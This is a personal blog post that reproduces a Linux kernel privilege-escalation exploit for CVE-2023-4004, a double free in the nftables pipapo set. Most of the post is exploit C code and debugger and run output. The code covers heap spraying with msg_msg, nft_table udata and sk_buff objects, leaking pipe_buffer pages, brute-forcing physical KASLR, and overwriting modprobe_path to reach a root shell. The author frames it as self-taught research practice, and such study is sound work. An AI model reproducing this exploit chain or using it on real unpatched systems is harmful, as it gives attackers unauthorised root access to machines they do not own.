Linux kernel exploitation: CVE-2023-4004

Posted Jan 31, 2025 Updated Aug 5, 2025

By Bam

25 min read

Introduction

It all started in early 2024 when I decided to focus on vulnerability research and exploit development for the Linux kernel in my free time after work. Every night, I would open my laptop and study this topic, and this routine continued for an entire year.

Right before the end of the year, I decided to challenge myself by reproducing exploits for specific CVEs to test how much I had learned and understood in this field. To be honest, I am still a complete beginner from every perspective, especially since my background is neither in IT nor academia. However, I wanted to break through these limitations.

At that point, I visited the KernelCTF repository to try reproducing CVEs that had already been reported by researchers. I chose two CVEs that, according to the researchers, were “easy” to trigger: CVE-2023-4004 and CVE-2023-4244 as my targets.

Why did I choose these two CVEs? First, I had previously studied nftables and CVEs related to nftables itself. Second, there are several CVEs with similar vulnerabilities, so I only needed to learn how to trigger the bug and escalate privileges to achieve root access.

What is nftables?

I won’t go into too much detail about nftables since I want to keep this post concise. But don’t worry—I will provide blog or reference posts that discuss nftables in detail at the end of this post.

nftables is a Netfilter project aimed at replacing the existing {ip, ip6, arp, eb} table framework, providing a new packet filtering framework for {ip, ip6}, a new userspace utility (nft), and a compatibility layer. It utilizes existing hooks, a connection tracking system, userspace queuing components, and the Netfilter logging subsystem.

It consists of three main components:

Kernel implementation – provides the netlink configuration interface and runtime rule set evaluation. Netlink communication via libnl – contains the fundamental functions for communicating with the kernel. Userspace front-end (nft) – facilitates user interaction with nftables. nftables implements packet data filtering using several key components such as table, set, chain, and rule.

Cause analysis

The researcher who discovered this bug found a vulnerability in the nft_pipapo_remove function located in /net/netfilter/nft_set_pipapo.c.

When a pipapo set attempts to remove an element, it first locates the element using NFT_SET_EXT_KEY and NFT_SET_EXT_KEY_END:

  
static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
			      const struct nft_set_elem *elem)
{
    ...
        match_start = data;
		match_end = (const u8 *)nft_set_ext_key_end(&e->ext)->data;

		start = first_rule;
		rules_fx = rules_f0;

		nft_pipapo_for_each_field(f, i, m) {
			if (!pipapo_match_field(f, start, rules_fx,
						match_start, match_end))
				break;
    ...

However, in that function, there is no check to verify whether NFT_SET_EXT_KEY_END is included in the pipapo set, which ultimately allows us to free an element without NFT_SET_EXT_KEY_END in the set repeatedly.

A proper check should have been implemented, similar to the one in the function:nft_pipapo_insert:

  
static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
			     const struct nft_set_elem *elem,
			     struct nft_set_ext **ext2)
{
    ...
	if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
		end = (const u8 *)nft_set_ext_key_end(ext)->data;
	else
		end = start;
    ...

Triggering the vulnerability

Before we proceed to trigger the vulnerability, there are several things to consider regarding commit, batch, and transaction in nftables. Understanding these three aspects helps us in exploiting the vulnerability—should the bug be triggered after a commit? Or is the double free caused by an abort?

What I mean is that I trigger this vulnerability in the next transaction after creating a set and inserting two elements in the previous batch and transaction.

To trigger the vulnerability, the original author performed:

Create a pipapo set:

Insert an element into the set without NFT_SET_EX`T_KEY_END.
Flush the set without NFT_SET_EXT_KEY_END. (At this point, the element will be freed but not removed from the set).
Flush the set without NFT_SET_EXT_KEY_END again. (At this point, the element will be freed again).

Meanwhile, I triggered it in a way similar to CVE-2024-26809 because it was easier:

Create a pipapo set.
Insert element A and element B simultaneously into the set without NFT_SET_EXT_KEY_END.
Delete element A (element B also gets deleted).
Delete element A again (element B also gets deleted again).

This is a powerful double-free primitive because it is not detected by CONFIG_SLAB_FREELIST_HARDENED.

If we want to free a double-free vulnerable object, we typically need to allocate another object of the same size before the second free to bypass this mitigation.

In this case, the reason it bypasses detection might be because both elements were allocated simultaneously within the set, and their second free occurred in the same batch and transaction, executed twice.

I’m still a bit confused about this behavior, and I hope that a veteran researcher will read my post, review my exploit code, and validate or correct my exploit strategy and analysis.

I would be thrilled if that happens! 😊.

Exploit it

The goal of my exploit is to achieve a double free in kmalloc-cg-1k to leak pipe_buffer->page, which allows us to obtain the vmemmap base address. After that, we can perform physical read and write operations.

Using this primitive, we can overwrite the string in modprobe_path to point it to a memory file created using memfd_create, located under /proc/<pid>/fd/<n>.

Preparation Before Triggering the Vulnerability Before triggering the bug, we spray msg_msg objects in kmalloc-cg-256, ensuring that each secondary message is placed in kmalloc-cg-1k.

By incrementing the next pointer of msg_msg objects that we control by 256, we can make it point to a secondary message that is already referenced by a different primary message, creating a duplicate reference.

This technique allows us to easily pivot our double-free primitive to a different cache, enabling us to target more objects in the system.

  
...
// Spray msg_msg in kmalloc-256 and kmalloc-1k
    msg_t *msg = calloc(1, sizeof(msg_t) + 0xe8 - 48);
    int qid[SPRAY];
    for (int i = 0; i < SPRAY; i++)
    {
        qid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
        if (qid[i] < 0)
        {
            perror("[-] msgget");
        }
        *(uint32_t *)msg->mtext = i;
        *(uint64_t *)&msg->mtext[8] = 0xdeadbeefcafebabe;
        msg->mtype = MTYPE_PRIMARY;
        msgsnd(qid[i], msg, 0xe8 - 48, 0);
        msg->mtype = MTYPE_SECONDARY;
        msgsnd(qid[i], msg, 1024 - 48, 0);
    }
    // Prepare evil msg
    int evilqid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (evilqid < 0)
    {
        perror("[-] msgget");
    }
...

Next, we prepare an sk_buff, which we will later use to allocate a fake msg_msg. This allows us to leak pipe_buffer->page by reading sk_buff->data.

  
...
// Setup skbuf
    int sock[SKBUF_SPRAY][2];
    for (int i = 0; i < SKBUF_SPRAY; i++)
    {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sock[i]) < 0)
        {
            perror("[-] socketpair");
            return -1;
        }
    }
...

And now, we arrive at the vulnerability trigger section:

  
    ...
        // TRANSACTION 2
    batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit);
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // create pipapo set
    uint8_t desc[2] = {16, 16};
    set = create_set(
        batch, seq++, exploit_table_name, "pwn_set", 0x1337,
        NFT_SET_INTERVAL | NFT_SET_OBJECT | NFT_SET_CONCAT, KEY_LEN, 2, &desc, NULL, 0, NFT_OBJECT_CT_EXPECT);

    // commit 2 elems to set


    for (int i = 0; i < 2; i++)
    {
        elem[i] = nftnl_set_elem_alloc();
        memset(key, 0x41 + i, KEY_LEN);
        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_OBJREF, "pwnobj", 7);
        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);
        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_USERDATA, &udata_buf, udata_size);
        nftnl_set_elem_add(set, elem[i]);
    }

    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                NFT_MSG_NEWSETELEM, family,
                                NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK,
                                seq++);
    nftnl_set_elems_nlmsg_build_payload(nlh, set);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0)
    {
        perror("[-] [-] mnl_socket_sendto");
    }
    mnl_nlmsg_batch_stop(batch);

    // TRANSACTION 3
    batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit);
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    set = nftnl_set_alloc();
    nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);
    nftnl_set_set_str(set, NFTNL_SET_TABLE, exploit_table_name);
    nftnl_set_set_str(set, NFTNL_SET_NAME, "pwn_set");


    // double-free commited elems
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                NFT_MSG_DELSETELEM, family,
                                NLM_F_ACK,
                                seq++);
    nftnl_set_nlmsg_build_payload(nlh, set);
    nftnl_set_free(set);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0)
    {
        perror("[-] mnl_socket_sendto");
    }
    mnl_nlmsg_batch_stop(batch);

    batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit);
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    set = nftnl_set_alloc();
    nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);
    nftnl_set_set_str(set, NFTNL_SET_TABLE, exploit_table_name);
    nftnl_set_set_str(set, NFTNL_SET_NAME, "pwn_set");


    // double-free commited elems
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                NFT_MSG_DELSETELEM, family,
                                NLM_F_ACK,
                                seq++);
    nftnl_set_nlmsg_build_payload(nlh, set);
    nftnl_set_free(set);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0)
    {
        perror("[-] mnl_socket_sendto");
    }
    mnl_nlmsg_batch_stop(batch);     
    ...

CVE-2023-4004 is very easy to exploit because we can free its elements multiple times. The element size is not stable, meaning there are many ways to exploit it.

  
void *nft_set_elem_init(const struct nft_set *set,
			const struct nft_set_ext_tmpl *tmpl,
			const u32 *key, const u32 *key_end,
			const u32 *data, u64 timeout, u64 expiration, gfp_t gfp)
{
	struct nft_set_ext *ext;
	void *elem;

	elem = kzalloc(set->ops->elemsize + tmpl->len, gfp);
	if (elem == NULL)
		return NULL;
    ...

tmpl->len is related to user input, such as NFTA_SET_ELEM_USERDATA, which means we can control the element size. So we just need to find a structure to leak information. Look at this:

  
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
			    const struct nlattr *attr, u32 nlmsg_flags)
{
        ...
        if (ulen > 0) {
                if (nft_set_ext_check(&tmpl, NFT_SET_EXT_USERDATA, ulen) < 0) {
                    err = -EINVAL;
                    goto err_elem_userdata;
                }
                udata = nft_set_ext_userdata(ext);
                udata->len = ulen - 1;
                nla_memcpy(&udata->data, nla[NFTA_SET_ELEM_USERDATA], ulen); // element data length
        ...

After triggering the double free, we will reclaim the element heap with nft_tables using an element with a ulen length of 0x88+3, so it can be reclaimed by table->udata, which we provide with a similar size. This allows us to obtain a duplicate table->udata.

  
struct nft_table {
	struct list_head		list;
	struct rhltable			chains_ht;
	struct list_head		chains;
	struct list_head		sets;
	struct list_head		objects;
	struct list_head		flowtables;
	u64				hgenerator;
	u64				handle;
	u32				use;
	u16				family:6,
					flags:8,
					genmask:2;
	u32				nlpid;
	char				*name;
	u16				udlen;
	u8				*udata; //-> user data
};

Now, we spray 3 nft_table->udata and check if we get a duplicate in nft_table->udata.

  
...
void udata_spray(struct mnl_socket *nl, uint32_t size, uint32_t start, uint32_t count, void *data)
{
    char spray_name[16];
    char udata_buf[size];
    char *dptr = &udata_buf;
    uint32_t seq = rand() % (UINT32_MAX / 2);
    struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(mnl_batch_buffer, mnl_batch_limit);
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (data)
    {
        dptr = data;
    }

    for (int i = start; i < start + count; i++)
    {
        if (!data)
        {
            memset(udata_buf, 0x30 + i, size);
        }
        snprintf(spray_name, sizeof(spray_name), "spray-%i", i);
        nftnl_table_free(create_table(batch, seq++, spray_name, dptr, size));
    }

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0)
    {
        perror("[-] mnl_socket_sendto");
    }
    mnl_nlmsg_batch_stop(batch);
}
...
 udata_spray(nl, 0xe8, 0, 3, NULL);

    char spray_name[16];
    char *udata[3];
    for (int i = 0; i < 3; i++)
    {
        snprintf(spray_name, sizeof(spray_name), "spray-%i", i);
        udata[i] = getudata(nl, spray_name);
    }
    if (udata[0][0] == udata[2][0])
    {
        printf("[+] table spray-0->udata 0x%lx\n" ,*(uint64_t*)&udata[0][0]);
        printf("[+] table spray-2->udata 0x%lx\n" ,*(uint64_t*)&udata[2][2]);

        puts("[+] got duplicated table");
    }
    else
    {
        puts("[-] exploit failed");
        return -1;
    }
...

To better understand how we obtain the overlapping nft_table->udata, we can inspect it directly using GDB. However, I prefer to analyze it in more detail from the beginning, such as examining the msg_msg objects that we initially sprayed in GDB.

  
pwndbg> x/20gx msg

0xffff88810025a800:	0x0000000000000000	0x0000000000000000 -> msg->m_list 
0xffff88810025a810:	0x0000000000000041	0x00000000000000b8 -> 0x41 msg->mtype(MTYPE_PRIMARY) and 0xb8 = 0xe8 - 0x30... (232 - 48)
0xffff88810025a820:	0x0000000000000000	0x0000000000000000
0xffff88810025a830:	0x0000000000000000	0xdeadbeefcafebabe -> msg->mtext[8] in our exploit

pwndbg> x/40gx msg

0xffff8881041d1c00:	0xffff888102afd100	0xffff888102afd100 -> msg->m_list 
0xffff8881041d1c10:	0x0000000000000042	0x00000000000003d0 -> 0x42 msg->mtype(MTYPE_SECONDARY) and 0x3d0 = 0x400 - 0x30... (1024 - 48)
0xffff8881041d1c20:	0x0000000000000000	0x0000000000000000
0xffff8881041d1c30:	0x0000000000000000	0xdeadbeefcafebabe

Although this is not too important to examine, I always prefer to see everything as clearly and in detail as possible. Now, let’s take a look at our vulnerable function, how the vulnerability occurs, leading to a double free on the element and resulting in duplicate nft_table->udata:

To ensure consistency, our user data elements are assigned the value 0x41, with keys 0x41 (Element A) and 0x42 (Element B). As a result, the two nft_table instances will receive two udata values with the same data due to the double free on the element.

Additionally, in the udata_spray function that we used to spray the three nft_table->udata instances earlier, the values in udata start from 0x30 to 0x32.

  
...
for (int i = start; i < start + count; i++)
    {
        if (!data)
        {
            memset(udata_buf, 0x30 + i, size);
        }
        snprintf(spray_name, sizeof(spray_name), "spray-%i", i);
        nftnl_table_free(create_table(batch, seq++, spray_name, dptr, size));
    }
...

So, now let’s check our gdb again:

  
static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
			      const struct nft_set_elem *elem)
{
	struct nft_pipapo *priv = nft_set_priv(set);
	struct nft_pipapo_match *m = priv->clone;
	struct nft_pipapo_elem *e = elem->priv;
	int rules_f0, first_rule = 0;
	const u8 *data;

	data = (const u8 *)nft_set_ext_key(&e->ext);

->	e = pipapo_get(net, set, data, 0);
	if (IS_ERR(e))
		return;

	while ((rules_f0 = pipapo_rules_same_key(m->f, first_rule))) {
		union nft_pipapo_map_bucket rulemap[NFT_PIPAPO_MAX_FIELDS];
		const u8 *match_start, *match_end;
		struct nft_pipapo_field *f;
		int i, start, rules_fx;
...
pwndbg> x/40gx e 

0xffff888105615600:	0x3800000000000c03	0x4242424200003000
0xffff888105615610:	0x4242424242424242	0x4242424242424242
0xffff888105615620:	0x4242424242424242	0x0000000042424242
0xffff888105615630:	0xffff888105615900	0x414141414141418a
0xffff888105615640:	0x4141414141414141	0x4141414141414141
0xffff888105615650:	0x4141414141414141	0x4141414141414141
0xffff888105615660:	0x4141414141414141	0x4141414141414141
0xffff888105615670:	0x4141414141414141	0x4141414141414141
0xffff888105615680:	0x4141414141414141	0x4141414141414141
0xffff888105615690:	0x4141414141414141	0x4141414141414141
0xffff8881056156a0:	0x4141414141414141	0x4141414141414141
0xffff8881056156b0:	0x4141414141414141	0x4141414141414141
...

We successfully triggered the double free. Since we sprayed several nft_table->udata instances with approximately the same size beforehand, this caused two nft_table->udata instances to have the same value. This happened because one of the nft_table->udata instances occupied the double-free slot that we successfully triggered. Now, let’s inspect the nft_table:

pwndbg> x table

0xffff888102a56e00:	0xffff888105631280
pwndbg> x/s table->name

0xffff8881002563b8:	"spray-2"
pwndbg> x/10gx table->udata
quit
0xffff888105615600:	0x3232323232323232	0x3232323232323232
0xffff888105615610:	0x3232323232323232	0x3232323232323232
0xffff888105615620:	0x3232323232323232	0x3232323232323232
0xffff888105615630:	0x3232323232323232	0x3232323232323232
0xffff888105615640:	0x3232323232323232	0x3232323232323232

at this value 0xffff888105615600, which was previously the value of our element which was successfully triggered, is now occupied by the wrong nft_table->udata, this is the result:

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table

then, we replace with msg_msg, we allocate msg_msg with size 256(primary message) to occupy the duplicate nft_table->udata, then mere and 1k(secondary), size 256 as pseudo objects of nft_table. then make msg->m_list->next from the premier message pointing to a message of size 1k (secondary message), and when we read nft_table->udata, we will get the address kmalloc-cg-1k

  
pwndbg> x/40gx msg

0xffff888105615600:	0x3232323232323232	0x3232323232323232 ->msg->m_list 
0xffff888105615610:	0x0000000000000041	0x00000000000000b8 -> msg->mtype 0x41, size = 0xe8 - 0x30 = 0xb8 ... (232 - 48)
0xffff888105615620:	0x0000000000000000	0x0000000000000000
0xffff888105615630:	0x4141414141414141	0xdeadbeefcafebabe -> msg->mtext[8]

result:

pwndbg> x/40gx 0xffff888105615600

0xffff888105615600:	0xffff88810307a400	0xffff8881056157c0
0xffff888105615610:	0x0000000000000041	0x00000000000000b8
0xffff888105615620:	0x0000000000000000	0x0000000000000000
0xffff888105615630:	0x4141414141414141	0xdeadbeefcafebabe

This value 0xffff888105615600 is occupied by our primary message (kmalloc-cg-256), and msg->m_list->next points to kmalloc-cg-1k because that is the size of our secondary message, let’s prove it by getting nft_table again, and this is the result:

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table
[*] replace with msg_msg
[*] kmalloc-1k msg: 0xffff88810307a400

now, we need to find msg->next so we can do a double free on kmalloc-cg-1k like our first plan. by creating a fake secondary message that will be allocated as nft_table, and using msgrcv with the MSGCOPY flag so that the original message is not destroyed to find out what order the secondary message.

  
// Find next msg
    fake_obj[0] -= 1024 * 20;
    deludata_spray(nl, 2, 1);
    wait_destroyer();
    udata_spray(nl, 0xe8, 3, 1, fake_obj);
    wait_destroyer();
    if (msgrcv(evilqid, msg, 1024 - 48, MTYPE_SECONDARY, IPC_NOWAIT | MSG_COPY) < 0)
    {
        perror("[-] msgrcv");
    }

    int victim_idx = *(uint32_t *)msg->mtext;
    printf("[*] victim qid: %i\n", qid[victim_idx]);

this is the result:

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table
[*] replace with msg_msg
[*] kmalloc-1k msg: 0xffff88810307a400
[*] victim qid: 488

this step is what we expected, now we can create another secondary fake message and overwrite it with skbuf->data and do a double free to leak pipe_buffer->page

  
// Free kmalloc-1k msg
    if (msgrcv(qid[victim_idx], msg, 1024 - 48, MTYPE_SECONDARY, 0) < 0)
    {
        perror("[-] msgrcv");
    }

    // Replace msg with a fake msg using skbuf
    struct msg_msg *fake_msg = calloc(1, sizeof(struct msg_msg) + 1024 - 48);
    fake_msg->m_list.next = msg_ptr - 1024 * 20;
    fake_msg->m_list.prev = msg_ptr - 1024 * 20;
    fake_msg->m_type = MTYPE_FAKE;
    fake_msg->m_ts = 1024 - 48;
    *(uint64_t *)fake_msg->text = 0x1337133713371337;
    puts("[*] send fake msg skbuf");
    for (int i = 0; i < SKBUF_SPRAY; i++)
    {
        if (write(sock[i][0], fake_msg, 1024 - 320) < 0)
        {
            perror("[-] write(socket)");
            return -1;
        }
    }

    // Double free kmalloc-1k msg
    puts("[*] double-free victim msg");
    if (msgrcv(evilqid, msg, 1024 - 48, MTYPE_FAKE, 0) < 0)
    {
        perror("[-] msgrcv");
    }

    // Spray pipe_buffer victims
    int fdflags;
    int pfd[PIPE_SPRAY][2];
    for (int i = 0; i < PIPE_SPRAY; i++)
    {
        pipe(pfd[i]);
        fdflags = fcntl(pfd[i][0], F_GETFL, 0);
        fcntl(pfd[i][0], F_SETFL, fdflags | O_NONBLOCK);
        fdflags = fcntl(pfd[i][1], F_GETFL, 0);
        fcntl(pfd[i][1], F_SETFL, fdflags | O_NONBLOCK);
    }

    // Populate pipe_buffer
    for (int i = 0; i < PIPE_SPRAY; i++)
    {
        write(pfd[i][1], "pwn", 3);
    }

    // Leak pipe_buffer
    char leak[1024];
    struct pipe_buffer *pipebuf = calloc(1, 1024);
    puts("[*] read pipe_buffer with skbuf");
    for (int i = 0; i < SKBUF_SPRAY; i++)
    {
        if (read(sock[i][1], leak, 1024 - 320) < 0)
        {
            perror("[-] read(socket)");
            return -1;
        }
        if (*(uint64_t *)&leak[48] != 0x1337133713371337)
        {
            memcpy(pipebuf, leak, 1024);
            puts("[+] found pipe_buffer");
        }
    }

    uint64_t vmemmap_base = pipebuf->page & MASK;
    printf("[*] vmemmap_base: 0x%lx\n", vmemmap_base);

this is the result:

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table
[*] replace with msg_msg
[*] kmalloc-1k msg: 0xffff88810307a400
[*] victim qid: 488
[*] send fake msg skbuf
[*] double-free victim msg
[*] read pipe_buffer with skbuf
[+] found pipe_buffer
[*] vmemmap_base: 0xffffea0000000000

Bruteforce physical kernel base

With the ability to browse kernel memory pages and read/write them, we can easily search for any value we want to overwrite, like modprobe_path. Keep in mind that searching page by page from the beginning of vmemmap_base can be very time consuming due to the physical address of the place The kernel is loaded randomly. However, the start of the base kernel is always aligned with the constant value PHYSICAL_ALIGN, which by default is 0x200000 in amd64. So, we can speed up our search by first only looking for addresses that align with something that looks like kernel base, and then start searching page by page from there.

  
...
// Bruteforce phys-KASLR
    uint64_t kernel_base;
    bool found = false;
    uint8_t data[PAGE_SIZE] = {0};
    puts("[*] bruteforce phys-KASLR");
    for (uint64_t i = 0;; i++)
    {
        kernel_base = 0x40 * ((PHYSICAL_ALIGN * i) >> PAGE_SHIFT);
        pipebuf->page = vmemmap_base + kernel_base;
        pipebuf->offset = 0;
        pipebuf->len = PAGE_SIZE + 1;

        printf("\r[*] trying 0x%lx", pipebuf->page);

        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (write(sock[i][0], pipebuf, 1024 - 320) < 0)
            {
                perror("\n[-] write(socket)");
                return -1;
            }
        }

        for (int j = 0; j < PIPE_SPRAY; j++)
        {
            memset(&data, 0, PAGE_SIZE);
            int count;
            if (count = read(pfd[j][0], &data, PAGE_SIZE) < 0)
            {
                continue;
            }

            if (!memcmp(&data, "pwn", 3))
            {
                continue;
            }

            if (is_kernel_base(data))
            {
                found = true;
                break;
            }
        }

        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (read(sock[i][1], leak, 1024 - 320) < 0)
            {
                perror("[-] read(socket)");
                return -1;
            }
        }

        if (found)
        {
            break;
        }
    }
    found = false;
    printf("\n[+] kernel base vmemmap offset: 0x%lx\n", kernel_base);
...

Notice that on line 39 we call the is_kernel_base() function. This function is based on an exploit from Lalu that basically matches some byte patterns that may be present in the kernel base page in various builds, to maximize compatibility.

  
...
static bool is_kernel_base(unsigned char *addr)
{
    // thanks lau :)

    // get-sig kernel_runtime_1
    if (memcmp(addr + 0x0, "\x48\x8d\x25\x51\x3f", 5) == 0 &&
        memcmp(addr + 0x7, "\x48\x8d\x3d\xf2\xff\xff\xff", 7) == 0)
        return true;

    // get-sig kernel_runtime_2
    if (memcmp(addr + 0x0, "\xfc\x0f\x01\x15", 4) == 0 &&
        memcmp(addr + 0x8, "\xb8\x10\x00\x00\x00\x8e\xd8\x8e\xc0\x8e\xd0\xbf", 12) == 0 &&
        memcmp(addr + 0x18, "\x89\xde\x8b\x0d", 4) == 0 &&
        memcmp(addr + 0x20, "\xc1\xe9\x02\xf3\xa5\xbc", 6) == 0 &&
        memcmp(addr + 0x2a, "\x0f\x20\xe0\x83\xc8\x20\x0f\x22\xe0\xb9\x80\x00\x00\xc0\x0f\x32\x0f\xba\xe8\x08\x0f\x30\xb8\x00", 24) == 0 &&
        memcmp(addr + 0x45, "\x0f\x22\xd8\xb8\x01\x00\x00\x80\x0f\x22\xc0\xea\x57\x00\x00", 15) == 0 &&
        memcmp(addr + 0x55, "\x08\x00\xb9\x01\x01\x00\xc0\xb8", 8) == 0 &&
        memcmp(addr + 0x61, "\x31\xd2\x0f\x30\xe8", 5) == 0 &&
        memcmp(addr + 0x6a, "\x48\xc7\xc6", 3) == 0 &&
        memcmp(addr + 0x71, "\x48\xc7\xc0\x80\x00\x00", 6) == 0 &&
        memcmp(addr + 0x78, "\xff\xe0", 2) == 0)
        return true;

    return false;
}
...

The next step we will get the physical address modprobe_path:

  
...
// Scan kernel memory
    uint64_t modprobe_page, modprobe_off;
    uint32_t pipe_idx;
    uint64_t base_off = 0;
    puts("[*] scanning kernel memory");
    for (uint64_t i = 0;; i++)
    {
        pipebuf->page = vmemmap_base + kernel_base + 0x40 * i;
        pipebuf->offset = 0;
        pipebuf->len = PAGE_SIZE + 1;

        if (!(i % 1000))
        {
            printf("\r[*] trying 0x%lx, %iMb", pipebuf->page, i * 4096 / 1024 / 1024);
        }
        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (write(sock[i][0], pipebuf, 1024 - 320) < 0)
            {
                perror("\n[-] write(socket)");
                return -1;
            }
        }

        for (int j = 0; j < PIPE_SPRAY; j++)
        {
            memset(&data, 0, PAGE_SIZE);
            int count;
            if (count = read(pfd[j][0], &data, PAGE_SIZE) < 0)
            {
                continue;
            }

            if (!memcmp(&data, "pwn", 3))
            {
                continue;
            }

            void *locate = (uint64_t *)memmem(&data, PAGE_SIZE, "/sbin/modprobe", sizeof("/sbin/modprobe"));
            if (locate)
            {
                puts("\n[+] found modprobe_path");
                modprobe_page = pipebuf->page;
                modprobe_off = (uint8_t *)locate - data;
                printf("[*] modprobe page: 0x%lx\n", modprobe_page);
                printf("[*] modprobe offset: 0x%lx\n", modprobe_off);
                found = true;
                pipe_idx = j;
                break;
            }
        }
...        

Overwriting modprobe_path

Finds the string /sbin/modprobe in kernel memory and replaces it with a controlled value that points to the file we finally have be relatively easy.

A very well-known trick to make this work, even if we run inside a chroot without being able to create files in the root file system, is using memfd exposed via /proc/<pid>/fd/<n>. It’s worth noting that, since our PID is outside the unprivileged namespace unknown, we will brute-force to find it.

  
...
    puts("[*] overwrite modprobe_path");
    for (int i = 0; i < 4194304; i++)
    {
        pipebuf->page = modprobe_page;
        pipebuf->offset = modprobe_off;
        pipebuf->len = 0;
        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (write(sock[i][0], pipebuf, 1024 - 320) < 0)
            {
                perror("[-] write(socket)");
                break;
            }
        }

        memset(&data, 0, PAGE_SIZE);
        snprintf(fd_path, sizeof(fd_path), "/proc/%i/fd/%i", i, modprobe_fd);

        lseek(modprobe_fd, 0, SEEK_SET);
        dprintf(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);

        if (write(pfd[pipe_idx][1], fd_path, 32) < 0)
        {
            perror("\n[-] write(pipe)");
        }

        if (check_modprobe(fd_path))
        {
            puts("[-] failed to overwrite modprobe");
            break;
        }

        if (trigger_modprobe(status_fd))
        {
            puts("\n[+] got root");
            goto out;
        }

        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (read(sock[i][1], leak, 1024 - 320) < 0)
            {
                perror("[-] read(socket)");
                return -1;
            }
        }
    }
    puts("[-] fake modprobe failed");
...

the final result

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table
[*] replace with msg_msg
[*] kmalloc-1k msg: 0xffff88810307a400
[*] victim qid: 488
[*] send fake msg skbuf
[*] double-free victim msg
[*] read pipe_buffer with skbuf
[+] found pipe_buffer
[*] vmemmap_base: 0xffffea0000000000
[*] bruteforce phys-KASLR
[*] trying 0xffffea0000040000
[+] kernel base vmemmap offset: 0x40000
[*] scanning kernel memory
[*] trying 0xffffea00000cca00, 35Mb
[+] found modprobe_path
[*] modprobe page: 0xffffea00000d9dc0
[*] modprobe offset: 0x4a0
[*] overwrite modprobe_path
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # whoami
root
/ # 

The complete exploit and test environment are on my github

Conclusion

I think I’m pretty happy and satisfied with my first success, even though I didn’t write the full exploit for it, and I wasn’t the one who discovered the bug. Because it was the only way to challenge myself despite a year of learning about Linux kernel vulnerability research and exploits. even though I am self-taught and despite my background having absolutely nothing to do with this field, I am quite satisfied to have reproduced the exploit for this cve and gotten my first root. If you are a veteran in this field who happens to read this, please provide criticism and suggestions for my first post about CVE to my gmail. And thank you very much to the researchers who have published their discoveries and writings which have made me learn a lot from them this past year.